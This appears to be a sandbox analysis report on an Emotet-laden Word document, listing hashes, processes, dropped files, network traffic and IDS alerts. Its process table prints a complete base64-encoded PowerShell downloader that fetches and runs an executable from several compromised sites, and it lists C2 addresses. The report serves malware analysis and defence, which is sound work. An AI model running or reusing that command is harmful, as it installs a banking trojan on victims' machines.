File name: | 最新の構造図.doc |
Full analysis: | https://app.any.run/tasks/d7ccc296-023b-4a6c-8997-51d06fdadb68 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 20, 2020, 05:37:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Consequatur., Author: Nathan Leroy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 20 01:15:00 2020, Last Saved Time/Date: Tue Oct 20 01:15:00 2020, Number of Pages: 1, Number of Words: 2064, Number of Characters: 11767, Security: 8 |
MD5: | CC41839CDF6DAF6311EE898669CCC473 |
SHA1: | 63C905FE9EFCE7B7181BC220F88658680FC4167E |
SHA256: | 00FDDC023C2F5C9F500B8592592B4399DE427AB2E657776AF747214D6E85F282 |
SSDEEP: | 3072:/JivKie6B/w2yiWydwPXk/7p16zy+S9Sd+l4PJhERTM5/oKUQ2t1zJ3ASY9h9l:/JiP/w2PGXu7p16zy+S9Sd+l4PJhERTU |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Consequatur. |
---|---|
Subject: | - |
Author: | Nathan Leroy |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:10:20 00:15:00 |
ModifyDate: | 2020:10:20 00:15:00 |
Pages: | 1 |
Words: | 2064 |
Characters: | 11767 |
Security: | Locked for annotations |
Company: | - |
Lines: | 98 |
Paragraphs: | 27 |
CharCountWithSpaces: | 13804 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CodePage: | Unicode UTF-16, little endian |
LocaleIndicator: | 1033 |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2480 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\最新の構造図.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3276 | POwersheLL -ENCOD IABTAGUAVAAtAHYAYQByAEkAQQBCAGwARQAgACAAKAAiAHMAYgAiACsAIgBBACIAKQAgACgAWwB0AHkAcABlAF0AKAAnAHMAWQBzAFQAJwArACcARQBtAC4AJwArACcASQBPACcAKwAnAC4AJwArACcAZABpAFIAJwArACcARQBjAFQAbwByAHkAJwApACkAIAA7ACAAIABTAEUAVAAtAFYAYQByAGkAYQBiAGwAZQAgAFEATgBFAG8AZAAgACgAWwB0AHkAUABFAF0AKAAnAFMAeQAnACsAJwBzAHQARQBNAC4AJwArACcATgBFAFQALgBzACcAKwAnAEUAcgBWAEkAYwAnACsAJwBlAHAATwBpAG4AJwArACcAdABtACcAKwAnAEEATgBBACcAKwAnAEcAJwArACcARQByACcAKQApACAAIAA7ACAAIAAgACAAUwB2ACAAKAAiADEAIgArACIANgBVAEUAWQAiACkAIAAoACAAIABbAHQAWQBQAEUAXQAoACcAUwB5ACcAKwAnAHMAdABFAG0AJwArACcALgBOACcAKwAnAGUAVAAuAHMARQBjAHUAUgBJAHQAJwArACcAeQBQAHIAbwAnACsAJwB0AE8AQwBPACcAKwAnAEwAdAB5AFAAZQAnACkAKQAgADsAJABEAHcAMgB2AG4AdwBkAD0AKAAnAEwAJwArACcAMwBqAGYAXwBvADIAJwApADsAJABFAHYAMwBpAHQAMQB0AD0AJABKAGsAbwAyAHMAZwBvACAAKwAgAFsAYwBoAGEAcgBdACgAOAAwACAALQAgADMAOAApACAAKwAgACQAWABoAHMAcgBmADAAdQA7ACQASgA3AGQAOABfADkAMwA9ACgAJwBCACcAKwAnAHQAdgA4AGcAYgAnACsAJwByACcAKQA7ACAAKAAgACAARwBlAHQALQB2AGEAUgBJAEEAYgBMAGUAIAAgACgAIgBzAEIAIgArACIAQQAiACkAIAAtAFYAQQBMAHUAZQBvAG4AKQA6ADoAYwBSAGUAYQBUAGUAZABpAHIAZQBjAHQATwByAHkAKAAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACAAKwAgACgAKAAnAEIAJwArACcAMAAnACsAJwA2AFYAZgBnAF8AeQBwAGgAQgAwACcAKwAnADYAVgB5ADQAXwBxAGUAaQBCADAAJwArACcANgAnACkAIAAgAC0AcgBlAFAAbABBAEMAZQAgACAAKABbAGMAaABhAHIAXQA2ADYAKwBbAGMAaABhAHIAXQA0ADgAKwBbAGMAaABhAHIAXQA1ADQAKQAsAFsAYwBoAGEAcgBdADkAMgApACkAOwAkAFkAegB4AGYAMQBzAHAAPQAoACcARgB6AHoAJwArACcAZgBlACcAKwAnAHcAcwAnACkAOwAgACgARwBlAHQALQB2AEEAUgBJAGEAQgBsAEUAIABRAG4AZQBvAGQAIAApAC4AdgBhAGwAdQBFADoAOgBzAEUAYwB1AFIAaQBUAFkAUAByAE8AVABPAEMAbwBsACAAPQAgACAAJAAxADYAdQBlAFkAOgA6AFQATABzADEAMgA7ACQARgBoADUAZABrADUAZgA9ACgAJwBOAGcAJwArACcAegAnACsAJwBfAHcAcwA2ACcAKQA7ACQATQBlAHkAbQBmADAAMAAgAD0AIAAoACcAVABiAHUAcQBtACcAKwAnAHAAbQA2AHIAJwApADsAJABSAGsAagB3AGQAcABhAD0AKAAnAFIAXwBpAG4AZgBkACcAKwAnAHUAJwApADsAJABRAHUANABxAG0AMgA1AD0AKAAnAEsAYwBjACcAKwAnAGIAZgA0ADcAJwApADsAJABWADcAcQBpADcAegBnAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHcAOABkAFYAJwArACcAZgBnAF8AeQAnACsAJwBwAGgAdwA4AGQAJwArACcAVgB5ADQAXwBxACcAKwAnAGUAJwArACcAaQAnACsAJwB3ADgAZAAnACkALgBSAGUAcABMAGEAQwBFACgAJwB3ADgAZAAnACwAWwBTAFQAUgBJAE4AZwBdAFsAQwBoAEEAcgBdADkAMgApACkAKwAkAE0AZQB5AG0AZgAwADAAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwAkAFEAZgBmADYAZgA4AGQAPQAoACcAWQB0ADQANwB4AG4AJwArACcANwAnACkAOwAkAEYAcAA5AHgANwA3AG0APQBOAEUAVwBgAC0AYABPAGIASgBFAEMAVAAgAG4ARQBUAC4AdwBFAGIAYwBMAEkARQBOAHQAOwAkAFAAbAB6AGgAegBiADkAPQAoACcAaAB0AHQAcABzADoALwAvAHEAdQBhAG4AdAB1ACcAKwAnAG0AZQAnACsAJwBkAHUALgBjACcAKwAnAG8AbQAnACsAJwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvACcAKwAnADIANAAzADYAaQAnACsAJwBUAG0ANABhAGMALwAqAGgAJwArACcAdAB0AHAAJwArACcAcwA6AC8ALwBmAGEAcwB0AG0AbwB0AG8AcgAuACcAKwAnADAAMAAwACcAKwAnAHcAZQBiAGgAbwBzAHQAYQAnACsAJwBwAHAALgBjAG8AJwArACcAbQAvAHcAcAAtAGEAZAAnACsAJwBtACcAKwAnAGkAbgAvACcAKwAnAE4AJwArACcAeABvAFYANABZAEkAVQAvACoAaAB0ACcAKwAnAHQAcAAnACsAJwBzADoALwAvAGUAYwBvAGwAZQBrAC4AZQBlAC8AdwBwAC0AYQBkACcAKwAnAG0AaQBuAC8ARQBWADAAJwArACcAUAAvACcAKwAnACoAaAB0ACcAKwAnAHQAcAA6AC8ALwB3AHcAdwAuAHAAbwAnACsAJwByAG4AJwArACcAbQAnACsAJwBhAG4ALgBjAG8AbQAvAGkAbQBnAC8AQwAvACoAaAB0AHQAJwArACcAcABzADoALwAnACsAJwAvAGUAeAAnACsAJwBhACcAKwAnAG0AcwAnACsAJwBpAG4AZgBvAC4AaQAnACsAJwBuAC8AJwArACcAdwBwACcAKwAnAC0AYwBvACcAKwAnAG4AdABlAG4AdAAvAG8AJwArACcAaABVACcAKwAnADgAWgBEAEMAOAAnACsAJwBJAFgALwAqACcAKwAnAGgAdAB0AHAAOgAvAC8AZAAnACsAJwBlACcAKwAnAGEAbABzAG0AZQBkACcAKwAnAGkAYQAuAGkAbgAvACcAKwAnAHcAcAAtACcAKwAnAGMAbwAnACsAJwBuAHQAZQBuAHQALwBPAGIANwAzAHUASQAnACsAJwAvACoAaAB0AHQAJwArACcAcAA6AC8ALwBoAHAAdwAnACsAJwBkACcAKwAnAHkAJwArACcALgBjACcAKwAnAG8AbQAvACcAKwAnAGQAbwBjAHMALwBqAGMAZAB1AHQAJwArACcAagAnACsAJwBqAC8AJwApAC4AUwBQAGwASQBUACgAJABYAGUAMwAzAGIAYgA0ACAAKwAgACQARQB2ADMAaQB0ADEAdAAgACsAIAAkAE0AcQBoAGEAbgAwADAAKQA7ACQAQwBrADEAYQA5ADEAYwA9ACgAJwBMACcAKwAnAHUAcgAnACsAJwA1ADkAOQBoACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBvADMAbwAyADIAdwAgAGkAbgAgACQAUABsAHoAaAB6AGIAOQApAHsAdAByAHkAewAkAEYAcAA5AHgANwA3AG0ALgBEAE8AVwBOAEwAbwBBAGQAZgBJAGwAZQAoACQAUQBvADMAbwAyADIAdwAsACAAJABWADcAcQBpADcAegBnACkAOwAkAEUAdwBmAGIAYQBkADkAPQAoACcASgAnACsAJwBoACcAKwAnAG8AMQAxAGMAOAAnACkAOwBJAGYAIAAoACgARwBlAHQALQBgAEkAYABUAGUATQAgACQAVgA3AHEAaQA3AHoAZwApAC4ATABlAE4ARwBUAEgAIAAtAGcAZQAgADMAOQA2ADcAOAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAJwArACcAaQBuADMAJwArACcAMgBfAFAAcgBvAGMAZQBzAHMAJwApACkALgBjAFIARQBhAHQARQAoACQAVgA3AHEAaQA3AHoAZwApADsAJABYADMAbgB4ADcAdABnAD0AKAAnAEIAbAAnACsAJwBzAHUAXwBhACcAKwAnAHQAJwApADsAYgByAGUAYQBrADsAJABEADYAMgA1ADkANwBhAD0AKAAnAEMAJwArACcAeAAyAG0AbQBhAG8AJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABNAGoAYQBmADYAcABrAD0AKAAnAFkAJwArACcAXwAwADMAcAAnACsAJwBjAG4AJwApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2940 | C:\Users\admin\Vfg_yph\Vy4_qei\Tbuqmpm6r.exe | C:\Users\admin\Vfg_yph\Vy4_qei\Tbuqmpm6r.exe | wmiprvse.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2164 | "C:\Users\admin\AppData\Local\msports\bitsigd.exe" | C:\Users\admin\AppData\Local\msports\bitsigd.exe | Tbuqmpm6r.exe | |
User: admin Company: TODO: <Co Integrity Level: MEDIUM Description: TODO: <File descri Version: 1.0.0.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4059.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3276 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0HTZ7QWT5UK6CGETDU4C.temp | — | |
MD5:— | SHA256:— | |||
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:20466B06F0A00B2D5D586989959D4DFD | SHA256:8F515D76BD571A498263F262126F0EAB5E11F2F482F573010F0B30EB65499481 | |||
3276 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
2480 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6FE8D9620A4D82C7283248FDA833BC8C | SHA256:3A2A97CED786E5162AF24B59B5D90E80189A1B2AFDE63BFBEB055599EC77E0EC | |||
2940 | Tbuqmpm6r.exe | C:\Users\admin\AppData\Local\msports\bitsigd.exe | executable | |
MD5:7A158E81E2FFAAA875CDDCD1B6ADEBB3 | SHA256:657581976070A7AB2F1B4AB03B87DDC297AFC5E884C093D7401CCE1762CAE1E8 | |||
3276 | POwersheLL.exe | C:\Users\admin\Vfg_yph\Vy4_qei\Tbuqmpm6r.exe | executable | |
MD5:7A158E81E2FFAAA875CDDCD1B6ADEBB3 | SHA256:657581976070A7AB2F1B4AB03B87DDC297AFC5E884C093D7401CCE1762CAE1E8 | |||
3276 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d4b56.TMP | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$最新の構造図.doc | pgc | |
MD5:3A424905C2212E19CF69E5AEF1F33089 | SHA256:BB4818A5F1FD8A56175A6307326DBA78845199A6DEF24934C1F113431A508414 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2164 | bitsigd.exe | POST | — | 177.130.51.198:80 | http://177.130.51.198/bSH7gHF/QIY8DCChwYeJQaQ/ | BR | — | — | malicious |
2164 | bitsigd.exe | POST | — | 104.131.144.215:8080 | http://104.131.144.215:8080/fhxJybL/fuc7gGX6F7B6cmVDrDM/xrm3m/3lrINYU/ZjBBWB6IQJ3Axf7J/Ddzt2S/ | US | — | — | malicious |
2164 | bitsigd.exe | POST | — | 91.121.87.90:8080 | http://91.121.87.90:8080/mGFTnGDD/7GN3xSrmDAUDm/ebFMm/ntYI8yWpaoLwt7/Q7w6sZrNrWe5ZHik/ | FR | — | — | malicious |
2164 | bitsigd.exe | POST | 200 | 188.226.165.170:8080 | http://188.226.165.170:8080/ZdsCzlyqdRI/NTGXZL7C3Z60c/6A3w0MBAW5L/SWVyV/0LTDl3/6dJuF7v4DDI/ | NL | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2164 | bitsigd.exe | 177.130.51.198:80 | — | Wsp Serviços de Telecomunicações Ltda | BR | malicious |
3276 | POwersheLL.exe | 172.67.212.91:443 | quantumedu.com | — | US | unknown |
3276 | POwersheLL.exe | 145.14.145.6:443 | fastmotor.000webhostapp.com | Hostinger International Limited | US | shared |
2164 | bitsigd.exe | 104.131.144.215:8080 | — | Digital Ocean, Inc. | US | malicious |
2164 | bitsigd.exe | 188.226.165.170:8080 | — | Digital Ocean, Inc. | NL | malicious |
2164 | bitsigd.exe | 91.121.87.90:8080 | — | OVH SAS | FR | malicious |
Domain | IP | Reputation |
---|---|---|
quantumedu.com |
| unknown |
fastmotor.000webhostapp.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
3276 | POwersheLL.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com) |
2164 | bitsigd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |
2164 | bitsigd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |